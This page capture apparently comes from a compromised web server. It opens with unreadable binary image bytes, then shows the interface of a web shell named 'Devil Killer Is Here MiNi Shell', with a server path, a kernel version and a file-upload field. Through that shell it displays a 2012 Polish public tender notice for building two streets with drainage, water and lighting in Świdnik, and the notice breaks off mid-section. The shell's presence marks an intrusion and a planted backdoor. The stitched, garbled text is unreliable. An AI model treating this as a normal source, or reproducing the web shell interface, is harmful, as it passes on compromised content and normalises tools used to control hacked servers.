JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121129/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121129/252559-N-2012.html

<p class="kh_header"><b>Świdnik: Budowa ul. Traugutta i ul. Pola w Świdniku 
wraz z infrastrukturą towarzyszącą</b><br>
<b>Numer ogłoszenia: 252559 - 2012; data zamieszczenia: 29.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska  Świdnik , ul. Kard. St. Wyszyńskiego 15, 21-040 Świdnik, woj. lubelskie, tel. (081) 468 66 25, faks 081 751 76 08.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.swidnik.tensoft.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa ul. Traugutta i ul. Pola w Świdniku 
wraz z infrastrukturą towarzyszącą.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 4.1 Przedmiotem zamówienia jest budowa ulic w obszarze osiedla Radość i Adampol w Świdniku tj. ulic Romualda Traugutta i Wincentego Pola, budowę oświetlenia drogowego, przebudowę i budowę kanalizacji deszczowej wraz z wpustami i przykanalikami, przebudowę i budowę kanalizacji sanitarnej wraz z przyłączami, przebudowę i budowę sieci wodociągowej wraz z przyłączami oraz likwidację kolizji kabli SN i nn związanych z budową ulic.

4.2Branża drogowa
4.2.1 ul.Traugutta
Projektowany odcinek ul. Traugutta położony jest w zachodniej części miasta i łączy on osiedla mieszkaniowe Radość i Adampol. Przedmiotem inwestycji jest odcinek od  ul. Dworcowej do ul. Racławickiej. Wykonanie tego odcinka ułatwi mieszkańcom osiedli mieszkaniowych Radość i Adampol dojazd do Alei Lotników Polskich.
Natomiast odcinek ulicy Wincentego Pola łączy ulice Staszica i Traugutta oraz ułatwi mieszkańcom dostęp do ul. Racławickiej i w konsekwencji do głównych arterii komunikacyjnych miasta.
Ulica Romualda Traugutta - obecnie o nawierzchni gruntowej ulepszonej tłuczniem betonowym i żużlem oraz lokalnie płytami betonowymi.Zgodnie z wypisem z Planu Zagospodarowania zespołu osiedli Radość i Adampol w Świdniku ul. Romualda Traugutta jest ulicą klasy KDL o szerokości w liniach rozgraniczających od 10 do 22 m.Długość ulicy objętej opracowaniem wynosi 778 mb.Połączenie ul. Traugutta z ul. Racławicką, ul. Kruczkowskiego, ul. Koło, ul. Staszica, ul. Pola, al. Wojska Polskiego, ul. Sienkiewicza nowoplanowaną i ul. Dworcową następuje poprzez istniejące już fragmenty ul. Traugutta.
W projekcie uwzględniono istniejące i planowane zjazdy o charakterze publicznym. Projektowana ulica Romualda Traugutta posiada jezdnię o szerokości 5,5 m o nawierzchni z kostki betonowej na całej długości.
Po stronie wschodniej, a także w kilku miejscach po stronie zachodniej, zlokalizowano chodnik o szerokości od 1,2 m do 2,0 m. Po stronie zachodniej, w miejscach gdzie nie zaprojektowano chodnika planuje się wykonać opaskę z kostki betonowej o szerokości 0,5 m. Zaprojektowano zjazdy do posesji o szerokości 3 - 4,5 m z nawierzchnią z kostki brukowej oraz chodniki prowadzące do furtek o szerokości 1 m.
Zakres robót rozpoczyna się na ulicy Racławickiej od skrzyżowania z ulicą Radość i ulicą Piękną. Następuje zwężenie pasów jezdni i wbudowanie wewnętrznego pasa zieleni o szerokości 13,4 m, szerokość pasów jezdni wynosi 3,5 m. Przy skrzyżowaniu ulicy Traugutta z ulicą Racławicką planuje się wybudowanie ronda w kształcie owalnym. Długość ronda wynosi 24,0 m, a szerokość 12,27 m. Na tym odcinku szerokość pasów jezdni wynosi 4,0 m. 
Po stronie wschodniej planuje się wybudowanie chodnika.Za w/w skrzyżowaniem następuje granica przejścia z nawierzchni asfaltowej na nawierzchnię z kostki betonowej.Na odcinku pomiędzy ulicami Racławicką i Kruczkowskiego planuje się przenieść ogrodzenie leżące po obu stronach ulicy tak, aby nie kolidowało z nowoprojektowanym chodnikiem i przebudową sieci energetycznych. Przy skrzyżowaniu ulic Staszica i Traugutta projektuje się 2 przejścia dla pieszych o szerokości 4,0 m każde wraz z chodnikami po obu stronach ulicy. Pomiędzy skrzyżowaniami ulicy Traugutta z ulicą Pola i aleją Wojska Polskiego planuje się wybudowanie trzech parkingów przy posesjach o wymiarach miejsc parkingowych 2,5x5,0 m oraz 1 miejsce o szerokości 3,5 m. Nawierzchnie parkingów będą wykonane z ażurowej płyty betonowej grubości 10 cm.Pomiędzy aleją Wojska Polskiego a ulicą Sienkiewicza przy budynku szkoły projektuje się parking samochodowy na 10 miejsc postojowych o wymiarach 5,0 m x 2,5 m i 1 miejsce dla niepełnosprawnych o szerokości 3,5 m. Wymiary parkingu to 5,0 m x 28,5 m. Na odcinku od ulicy Sienkiewicza do ulicy Dworcowej planuje się wybudowanie chodnika po stronie wschodniej i opaski z kostki betonowej o gr. 6 cm po stronie zachodniej.

4.2.2w ul.Pola
Ulica Wincentego Pola - obecnie o nawierzchni gruntowej ulepszonej tłuczniem betonowym i żużlem.
Ulica Wincentego Pola jest ulicą klasy KDD o szerokości w liniach rozgraniczających 10 m. Długość projektowanej ulicy wynosi łącznie 255 mb. Droga łączy się poprzez skrzyżowania z ulicami Traugutta i Staszica.
Zaprojektowano chodnik równoległy do ulicy Staszica o szerokości 2,0 m łączący ulicę Wincentego Pola z ulicą Bohaterów Westerplatte połączony z elementem ścieku wód opadowych.
W projekcie uwzględniono istniejące i planowane zjazdy o charakterze publicznym. Projektowana ulica Wincentego Pola nie posiada chodników przy jezdni, po obu stronach ulicy Wincentego Pola projektuje się opaskę o szerokości 0,5 m. Wjazdy do posesji z kostki betonowej grubości 8 cm, a dojścia do furtek z kostki betonowej grubości 6 cm.Projektowana ulica posiada jezdnię o szerokości 5,0 m na odcinku prostopadłym do ulicy Traugutta i jezdnie o szerokości 4,0 m na odcinku prostopadłym do ulicy Staszica. 
Projektuje się nawierzchnie jezdni z kostki betonowej grubości 8 cm, a nawierzchnie opasek z kostki betonowej grubości 6 cm.
Z uwagi na włączenie ul. Traugutta i ul. Pola do istniejących już skrzyżowań z rozwiązaną organizacją ruchu dla potrzeb ulicy opracowano planszę oznakowania koordynującą ruch drogowy i pieszy.
W pasie drogowym ul. Traugutta i ul. Pola przewiduje się budowę oświetlenia ulicznego oraz budowę przykanalików i studni dla odwodnienia ulicy. Zaprojektowano również kanalizację sanitarną we fragmencie ul. Pola oraz elementy uzbrojenia sanitarnego dla posesji w granicach pasa drogowego. Dla elementów uzbrojenia będących w kolizji z projektowaną ulicą opracowano projekt usunięcia kolizji.
W pasie drogowym występują także inne podziemne urządzenia inżynieryjne zabezpieczone w stosowne przepusty i maty ochronne.

4.3Branża sanitarna
4.3.1 Kanalizacja deszczowa - Gmina Miejska Świdnik
W chwili obecnej odwodnienie ulic odbywa się powierzchniowo, woda opadowa kierowana jest na przyległy teren.
Dla projektowanych odcinków ul. Traugutta i ul. Pola projektuje się odprowadzenie wody opadowej do kanalizacji deszczowej ogólnospławnej za pośrednictwem wpustów burzowych. We fragmencie dolnym ul. Pola zaprojektowano odwodnienie powierzchniowe ściekiem otwartym do ul. Bohaterów Westerplatte.
Istniejące i projektowane kolektory deszczowe oraz przykanaliki i wpusty wody opadowej zlokalizowane są w pasie drogowym.

4.3.2 Kanalizacja sanitarna - PEGIMEK Sp. z o.o.
Dla istniejącej kanalizacji sanitarnej w ulicy R. Traugutta zaprojektowano urządzenie uzupełniające w postaci przyłączy do nieruchomości nie posiadających tych urządzeń. 
Na istniejącej sieci zaprojektowano studnie dla nowych przyłączy i odcinków sieci dla nowoplanowanych ulic osiedlowych. 
Przyłącza do nieruchomości i nowe odcinki sieci zaprojektowano do realizacji w granicach pasa drogowego. 
Istniejąca kanalizacja w ul. W. Pola została rozbudowana o brakujący odcinek od studni S38 do studni S39 w ul. Staszica. 
Istniejącą sieć wyposażono także w brakujące przyłącza do nieruchomości w granicach pasa drogowego.
Istniejące i projektowane elementy sieci sanitarnej zlokalizowane są w pasie drogowym oznaczonym na planie sytuacyjnym projektowanej kanalizacji sanitarnej.

4.3.3 Wodociąg - PEGIMEK Sp. z o.o.
Przebudowa wodociągu wraz z przyłączeniami na ul. R. Traugutta i W. Pola w obszarze kolidującym z budową w/w ulic. Projektowana przebudowa dotyczy przemieszczenia sieci z obszaru konstrukcji ulic w pas techniczny przeznaczony do lokalizacji urządzeń infrastruktury. 

4.4 Branża elektryczna
4.4.1 Oświetlenie drogowe
Projektowana ulica Traugutta i Pola otrzyma oświetlenie uliczne systemowe włączone do sieci.
Lokalizacja lamp gwarantuje prawidłowe oświetlenie ulicy i ciągów pieszych.

4.4.2 Zasilanie instalacji oświetlenia drogowego w ulicy Traugutta i Pola
Zasilanie instalacji oświetleniowej w ulicy Traugutta i Pola odbywać się będzie z istniejącej szafki oświetleniowej SO-33a. Projektowane oświetlenie będzie własnością Gminy Miejskiej Świdnik.

4.4.3 Słupy i oprawy oświetleniowe
Dobrano: 
słupy oświetleniowe aluminiowe anodowane na kolor czarny, okrągłe SAL-80K długości 8m bez wysięgnika, kąt pochylenia oprawy względem ulicy 5° fundament B-70, oprawy SGS 104/150 MALAGA-2 SON-T PIA PLUS 150 PHILIPS o mocy 175W z kompensacją mocy biernej, II klasy izolacji o stopniu ochrony IP 43 dla osprzętu i IP 65 dla układu optycznego, źródło światła sodowe SON-T-PLUS 150W. złącza słupowe ROSA TB-l 5x35mm2 II klasy izolacji o IP 54 zabezpieczenie D0l 6A 

Rozstawienie słupów przyjęto średnio co 28 m. Odległości ulegają odchyleniom w miejscach zagęszczenia instalacji podziemnej, umiejscowienia wjazdów do działek i posesji oraz parkingów.

4.4.4 Likwidacja kolizji kabli SN i nn
Zakresem opracowania objęto linie kablowe związane z budową ulicy Traugutta, ujęte w otrzymanych warunkach przebudowy urządzeń energetycznych Idz. 787/142/TB/TW/2010 wydanych przez Zakład Energetyczny Lublin-Teren.
Demontaż przewodów oświetleniowych i opraw w ul. Traugutta i ul. Pola.

4.5 KSIĄŻKA DROGI I EWIDENCJA DROGI
Zakres rzeczowy:
a)Wykonanie książki drogi zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 
16 lutego 2005 r. w sprawie sposobu numeracji i ewidencji dróg publicznych, obiektów mostowych, tuneli, przepustów i promów oraz rejestru numerów nadanych drogom, obiektom mostowym i tunelom (Dz. U. z dnia 25 kwietnia 2005 r.)
b)Zasilenie danymi istniejącej ewidencji dróg Zamawiającego pracującej w programie Ediom (v.2.15) oraz środowisku graficznym MapViewDesktop (v.2.3.20)
c)Kilometraż drogi ustalić należy z zarządcą drogi

4.6 INWENTARYZACJA POWYKONAWCZA
Zakres rzeczowy:
a)Dostarczenie inwentaryzacji powykonawczej w wersji papierowej
b)Dostarczenie inwentaryzacji powykonawczej w wersji elektronicznej z rozszerzeniem *.tiff
c)Dostarczenie inwentaryzacji powykonawczej (otwartej do edycji) z rozszerzeniem *.dxf lub *.shp wykonanej na współrzędnych geodezyjnych
d)Powyższa inwentaryzacja powykonawcza powinna zawierać dane dotyczące jezdni ulicy, chodników, zjazdów, opasek bezpieczeństwa, uzbrojenia podziemnego, uzbrojenia nadziemnego, oznakowania pionowego, urządzeń bezpieczeństwa ruchu, zieleni, drzew, itp.
Szczegółowy opis przedmiotu zamówienia oraz wymagania techniczne określone zostały w  SIWZ w załączniku nr 7 - Szczegółowa Specyfikacja Techniczna Wykonania i Odbioru Robót.
Uwaga!!! 
Na wykonanie przedmiotu zamówienia w zakresie 4.3.2 Branża sanitarna - kanalizacja sanitarna, 4.3.3 Branża sanitarna - wodociąg z Wykonawcą wyłonionym w przetargu, będzie podpisana oddzielna umowa przez firmę Przedsiębiorstwo Komunalne PEGIMEK   Sp. z o.o. 21-040 Świdnik ul.M.Konopnickiej 3. Ponadto w/w firma pokryje koszty wykonania powyższego zakresu przedmiotu zamówienia. Umowa zostanie zawarta według wzoru stanowiącego Załącznik Nr 1B do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających polegających na wykonaniu większej ilości tego samego rodzaju zamówień niż przewidywana w zamówieniu podstawowym jednakże nie przekraczającej 50 % wartości zamówienia podstawowego - zgodnie z zasadami wynikającymi z przepisu art. 67 ust. 1 pkt 6 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych /Dz .U. z 2010 r Nr 113, poz. 759 z późn. zm./.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.23.30.00-9, 45.10.00.00-8, 45.30.00.00-0, 45.11.00.00-1, 45.23.10.00-5, 45.23.20.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 60000</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia tego warunku Wykonawca musi wykazać, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, wykonał (wybudował, przebudował -  ulice, parkingi, chodniki o nawierzchni z kostki wibroprasowanej) dla maximum dwóch inwestycji branży drogowej o nawierzchni z kostki betonowej
wibroprasowanej o powierzchni łącznej 5000m2 wraz z infrastrukturą towarzyszącą. Pod pojęciem  /infrastrukturą towarzyszącą/ oznacza, że umieszczone w wykazie robót budowlanych inwestycje muszą obejmować budowę (przebudowę,remont) nawierzchni jak i budowę (przebudowę,remont) kanalizacji (sanitarnej lub deszczowej),budowę (przebudowę,remont) oświetlenia ulicznego.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia tego warunku Wykonawca musi wykazać, że dysponuje lub będzie dysponował osobami (dla każdego uprawnienia oddzielnie lub łącznie):
a) z uprawnieniami  do kierowania robotami budowlanymi - branża drogowa
b) z uprawnieniami  do kierowania robotami budowlanymi - branża elektryczna
c) z uprawnieniami  do kierowania robotami budowlanymi - branża sanitarna</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Dokument potwierdzający wniesienie wadium. 2.W przypadku, gdy wykonawcę reprezentuje pełnomocnik - pełnomocnictwo określające jego zakres i podpisane przez osoby uprawnione do reprezentacji wykonawcy. 3.W przypadku, gdy ofertę składają wykonawcy ubiegający się wspólnie o udzielenie zamówienia wymagane jest załączenie dokumentu pełnomocnictwa określającego zakres umocowania pełnomocnika ustanowionego do reprezentowania ich w postępowaniu, stosownie do art. 23 ust. 2 ustawy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuści dokonywanie zmian w umowie w sprawie zamówienia publicznego w następującym zakresie i na następujących warunkach:
1) Zmiany w umowie można wprowadzić za zgodą obu stron na piśmie, pod rygorem nieważności. Zmiany umowy nie mogą naruszać art. 144 ustawy.
